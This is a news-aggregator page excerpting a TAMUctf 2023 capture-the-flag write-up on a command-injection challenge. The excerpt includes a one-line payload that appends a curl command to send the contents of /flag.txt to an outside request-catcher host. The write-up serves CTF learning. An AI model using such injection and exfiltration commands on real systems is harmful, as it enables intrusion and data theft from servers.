all InfoSec news logo
all InfoSec news - Your InfoSec news aggregator
Log in Sign up
all InfoSec news

TAMUctf 2023 — Connect writeup

Add to bookmarks
May 3, 2023, 9:23 a.m. | Ayush Shah

System Weakness - Medium systemweakness.com

TAMUctf 2023 — Connect writeup

This challenge is created by Mr. Blade

Download the connect.zip file. We have app.py

I had modified that so that I could run it and test it locally.

We can add more command by adding ; .

I had created an request catcher with https://requestcatcher.com/ to capture the request.

Let’s do command injection by adding ; curl -s https://flag.requestcatcher.com/$(cat /flag.txt)

The flag path is mentioned in the challenge description.

I used burp and url encoded …

capture-the-flag cybersecurity ethical hacking programming python

Visit resource

More from systemweakness.com / System Weakness - Medium

IDOR Attacks Demystified: How They Work and How to Prevent Them 3 days, 15 hours ago | systemweakness.com
attacks business compromise confidentiality +13
How does Single Sign-on (SSO) interact with Active Directory (AD) and Outlook? 3 days, 15 hours ago | systemweakness.com
access active directory applications authentication +15
OSI Model & TCP/IP Comparison 3 days, 15 hours ago | systemweakness.com
access communication deals frameworks +14
First AD home lab 4 days, 11 hours ago | systemweakness.com
access active directory building can +17
3 Steps to protect yourself from Prompt Injection 4 days, 11 hours ago | systemweakness.com
prompt-engineering prompt injection security
Clocky | TryHackMe Write-up 5 days, 10 hours ago | systemweakness.com
ctf ctf-writeup tryhackme tryhackme-walkthrough +1
Bypassing Aquatone’s lack of ability to take screenshots of private websites 5 days, 10 hours ago | systemweakness.com
automation cybersecurity hacking pentesting +1
Tuesday Morning Threat Report: Apr 30, 2024 5 days, 10 hours ago | systemweakness.com
analysis artificial intelligence bad customers +21
Staying Anonymous — Ethical Hacking as a Beginner [09] 5 days, 10 hours ago | systemweakness.com
anonymous beginner communication cybersecurity +22

Jobs in InfoSec / Cybersecurity

Post a job on infosec-jobs.com Find talent on infosec-jobs.com

Director, Cyber Risk

@ Kroll | South Africa
View on infosec-jobs.com

Security Engineer, XRM

@ Meta | New York City
View on infosec-jobs.com

Security Analyst 3

@ Oracle | Romania
View on infosec-jobs.com

Internship - Cyber Security Operations

@ SES | Betzdorf, LU
View on infosec-jobs.com

Principal Product Manager (Network/Security Management) - NetSec

@ Palo Alto Networks | Bengaluru, India
View on infosec-jobs.com

IT Security Engineer

@ Timocom GmbH | Erkrath, Germany
View on infosec-jobs.com
View more jobs